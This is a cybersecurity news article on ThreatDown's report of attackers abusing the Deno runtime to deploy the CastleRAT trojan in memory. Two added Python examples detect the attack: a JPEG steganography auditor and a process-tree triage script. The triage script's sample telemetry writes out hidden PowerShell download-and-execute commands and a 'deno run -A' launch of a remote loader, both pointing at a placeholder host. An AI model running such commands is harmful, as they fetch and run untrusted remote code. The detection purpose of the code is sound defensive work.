SecurityBrief India - Technology news for CISOs & cybersecurity decision-makers

Attackers abuse Deno runtime to deploy fileless malware

Thu, 12th Mar 2026

ThreatDown has reported what it describes as the first known case of attackers abusing the Deno JavaScript runtime to run fileless malware and evade endpoint defences.

ThreatDown's Endpoint Detection and Response team identified a multi-stage attack chain that culminated in the deployment of CastleRAT, a remote access Trojan. The malware runs entirely in system memory and does not appear on disk as a conventional executable.

The company said the approach signals a shift away from malicious binaries that antivirus engines can scan on disk. Instead, the chain centres on a legitimate, code-signed developer tool that is widely used and may draw less scrutiny from security products focused on file-based detection.

Attackers have long used legitimate tools already present on operating systems in so-called living-off-the-land activity. ThreatDown described the Deno case as an expansion of that concept into third-party developer runtimes.

"This is the first time we've seen attackers co-opt the Deno runtime in the wild, and it signals a broader shift in how threat actors think about evasion," said Marco Giuliani, vice president and head of research at ThreatDown.

"Deno is legitimate software that security products trust. By exploiting that trust, attackers can execute malicious code in ways many endpoint defences aren't designed to monitor," Giuliani said.

The research was led by Lorenzo Corazzi, a malware research engineer at ThreatDown.

ClickFix lure

According to ThreatDown, the intrusion begins with a social engineering technique known as ClickFix. Victims see a fake browser error or CAPTCHA-style prompt that instructs them to copy and paste a command into their system.

Because the user executes the initial command themselves, this step can bypass some web security controls. The command then downloads and installs Deno on the device.

Deno is an open-source JavaScript and TypeScript runtime used for scripting and application work. ThreatDown said its legitimacy and code-signing can create a trust gap when security tools pay more attention to unknown executables written to disk than to actions inside a trusted process.

Image payload

The next phase uses steganography, which hides data inside an otherwise ordinary file. ThreatDown said the attackers concealed an encrypted malware payload inside a JPEG image.

A script decodes the image and injects the payload directly into memory. By avoiding an executable on the hard drive, the chain reduces the chance of detection by tools that scan files at rest.
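The article does not say how the payload was embedded in the JPEG, so the following added example (not ThreatDown's tooling, and not the loader's logic) shows the check a responder would run first on a suspect image: walk the JPEG marker structure and report anything that is not image data, namely bytes appended after the End-of-Image marker and oversized APPn/COM metadata segments, both common hiding places. The sample JPEG is constructed inline; the trailing bytes stand in for an encrypted blob and are an assumption, not data from the incident.

```python
"""Audit a JPEG for data that sits outside the image structure.
Added example: checks for bytes after EOI and for bloated metadata segments.
The sample file below is constructed for illustration."""
import math
import struct
from collections import Counter

EOI, SOS = 0xD9, 0xDA
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))  # TEM, SOI, EOI, RST0..RST7


def parse_jpeg(data: bytes):
    """Walk marker segments. Returns (segments, trailing): segments is a list of
    (marker, payload_length); trailing is every byte after the EOI marker."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    segments, pos = [], 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:  # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            segments.append((marker, 0))
            pos += 2
            if marker == EOI:
                return segments, data[pos:]
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # includes the 2 length bytes
        segments.append((marker, length - 2))
        pos += 2 + length
        if marker == SOS:
            # Entropy-coded scan data follows the SOS header; it ends at the first
            # marker that is neither a stuffed 0xFF00 nor a restart marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def shannon_entropy(buf: bytes) -> float:
    """Bits per byte; encrypted or compressed data sits near 8, text near 4-5."""
    if not buf:
        return 0.0
    counts = Counter(buf)
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts.values())


def audit_jpeg(data: bytes, max_meta_bytes: int = 32 * 1024) -> dict:
    """Return structural findings that warrant a closer look at the file."""
    segments, trailing = parse_jpeg(data)
    findings = []
    if trailing:
        findings.append(f"{len(trailing)} bytes after EOI "
                        f"(entropy {shannon_entropy(trailing):.2f} bits/byte)")
    for marker, plen in segments:
        # APP0..APP15 (0xE0-0xEF) and COM (0xFE) can legitimately carry EXIF
        # thumbnails or ICC profiles, so the threshold is a tuning parameter.
        if (0xE0 <= marker <= 0xEF or marker == 0xFE) and plen > max_meta_bytes:
            findings.append(f"APP/COM segment 0x{marker:02X} is {plen} bytes")
    return {"segments": segments, "trailing_len": len(trailing),
            "trailing_entropy": shannon_entropy(trailing), "findings": findings}


def build_sample_jpeg(trailing: bytes = b"") -> bytes:
    """Constructed minimal JPEG: SOI, JFIF APP0, SOS header, 4 scan bytes, EOI."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    return b"\xff\xd8" + app0 + sos + b"\x12\x34\x56\x78" + b"\xff\xd9" + trailing


if __name__ == "__main__":
    clean = audit_jpeg(build_sample_jpeg())
    # bytes(range(64)) is a constructed stand-in for an appended encrypted blob
    suspect = audit_jpeg(build_sample_jpeg(bytes(range(64))))
    print("clean:", clean["findings"])
    print("suspect:", suspect["findings"])
```

A clean file yields no findings; the constructed suspect file reports 64 trailing bytes. Appended data is not proof of malice (some cameras and editors leave trailing bytes), but on a host where a script was seen reading an image shortly before a process injection, it is the artefact to pull for further analysis.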

ThreatDown described the result as a fileless infection (malware that runs in memory and leaves limited artefacts on disk), which can complicate incident response and post-compromise forensics.

CastleRAT access

Once running, CastleRAT acts as a remote access Trojan with spyware functions, ThreatDown said. It supports credential theft, surveillance and remote command execution.

ThreatDown said the malware can perform keylogging and hijack clipboard contents, including cryptocurrency wallet information. It can also activate webcams and microphones for monitoring.

ThreatDown said CastleRAT uses covert communication mechanisms and can establish persistence across reboots. It also hides behind legitimate processes and abuses Windows APIs.

Detection approach

ThreatDown said it detects and blocks the attack chain at multiple stages, identifying components as Trojan.CastleLoader and Trojan.CastleRAT.

It emphasised behavioural monitoring as a key defence. Rather than relying on file scanning, monitoring should focus on runtime behaviour, process execution anomalies and suspicious outbound communications consistent with command-and-control traffic.
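As an added illustration of the behavioural monitoring described above (not ThreatDown's detection logic), the following Python triages process-creation telemetry for the chain the article lays out: a user-pasted shell command under explorer.exe, a download-and-execute one-liner, and a Deno process running a remote script with broad permissions. The events, paths and hostnames are constructed; the Deno flags (`-A`, `--allow-*`) are real, the scoring threshold is an assumption to be tuned per estate.

```python
"""Behavioural triage of process-creation events for abuse of the Deno runtime.
Added example with constructed telemetry; not ThreatDown's detection rules."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str     # full path of the executable
    cmdline: str


@dataclass
class Alert:
    pid: int
    chain: list    # image basenames from the root ancestor to the flagged process
    reasons: list


SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "mshta.exe"}
USER_LAUNCHERS = {"explorer.exe"}  # the Win+R Run dialog and shell double-clicks spawn from explorer.exe
BROAD_PERMS = re.compile(r"(^|\s)(-A|--allow-all|--allow-run|--allow-net|--allow-write)(\s|=|$)")
REMOTE_SCRIPT = re.compile(r"\bhttps?://\S+\.(?:ts|js|mjs)\b", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(
    r"\b(irm|iwr|Invoke-WebRequest|Invoke-RestMethod|curl|wget)\b.*\b(iex|Invoke-Expression)\b",
    re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: dict, pid: int) -> list:
    """Follow ppid links upward; returns events root-first, cycle-safe."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def triage(events: list, min_reasons: int = 2) -> list:
    """Score every deno.exe launch by the indicators visible in its process tree."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        if basename(ev.image) != "deno.exe":
            continue
        chain = ancestry(by_pid, ev.pid)
        ancestors = chain[:-1]
        names = [basename(e.image) for e in chain]
        reasons = []
        if (any(basename(a.image) in SHELLS for a in ancestors)
                and any(basename(a.image) in USER_LAUNCHERS for a in ancestors)):
            reasons.append("deno launched from an interactive shell under explorer.exe (paste-and-run pattern)")
        if any(DOWNLOAD_EXEC.search(a.cmdline) for a in ancestors):
            reasons.append("ancestor shell runs a download-and-execute one-liner")
        if REMOTE_SCRIPT.search(ev.cmdline):
            reasons.append("deno executes a script fetched from a remote URL")
        if BROAD_PERMS.search(ev.cmdline):
            reasons.append("deno granted broad permissions (-A / --allow-*)")
        # Requiring two independent indicators keeps an ordinary developer who
        # opens cmd.exe and runs a local script from paging the on-call analyst.
        if len(reasons) >= min_reasons:
            alerts.append(Alert(ev.pid, names, reasons))
    return alerts


# Constructed sample telemetry (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    ProcessEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(200, 100, r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c powershell -w hidden -c "irm https://cdn.example.invalid/s.ps1 | iex"'),
    ProcessEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "irm https://cdn.example.invalid/s.ps1 | iex"'),
    ProcessEvent(400, 300, r"C:\Users\alice\.deno\bin\deno.exe",
                 "deno.exe run -A https://cdn.example.invalid/loader.ts"),
    # Benign developer activity: Deno started from an editor on a local file.
    ProcessEvent(500, 100, r"C:\Users\bob\AppData\Local\Programs\Microsoft VS Code\Code.exe", "Code.exe"),
    ProcessEvent(600, 500, r"C:\Users\bob\.deno\bin\deno.exe", "deno.exe run --allow-net src\\main.ts"),
    ProcessEvent(700, 1, r"C:\Program Files\Deno\deno.exe", "deno.exe test"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert.pid, " -> ".join(alert.chain))
        for r in alert.reasons:
            print("   ", r)
```

Only the process tree rooted at the pasted command is flagged; the editor-launched developer run collects a single indicator and stays below the threshold. In production the same logic would be paired with the network side the article mentions (outbound connections from deno.exe to hosts never seen in the estate), which process telemetry alone cannot show.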

The use of Deno adds to a broader trend of attackers exploiting legitimate tools that blend into normal environments. Developer runtimes, scripting engines and signed binaries can provide cover because they often exist in corporate estates and may appear routine to users and some security controls.

ThreatDown said Deno served as the execution framework for obfuscated scripts in this case and warned that organisations may need to expand monitoring beyond traditional executables and operating system utilities.

Giuliani said the incident reflects evolving evasion methods that shift the battleground from malicious files to trusted processes and in-memory execution.